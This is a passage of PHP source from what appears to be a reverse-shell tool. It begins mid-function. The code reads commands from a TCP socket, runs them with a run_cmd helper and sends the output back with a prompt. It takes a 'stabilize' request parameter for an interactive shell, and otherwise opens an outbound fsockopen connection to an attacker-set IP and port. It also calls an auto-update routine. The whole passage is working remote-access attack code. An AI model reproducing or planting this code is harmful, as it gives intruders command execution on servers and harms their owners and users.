")."Closing connection.\n"); fclose($s); die(); }else{ $out = run_cmd(substr($c, 0, -1)); } if($out === false){ fwrite($s, red('[-] There are no exec functions')); break; } refresh_ps1(); fwrite($s, $out.$ps1); } fclose($s); } ########################## END FUNCTIONS ########################## if($auto_verify_update) verify_update(); if(isset($_REQUEST['stabilize']) && $_REQUEST['stabilize']){ //stabilized shell was requested $x = $_POST['x']; stabilize($x); }else{ // use normal (not interactive) connection $s = @fsockopen("tcp://$ip", $port); if(!$s) die(red("[-] ")."Couldn't connect to socket $ip:$port."); connect(); }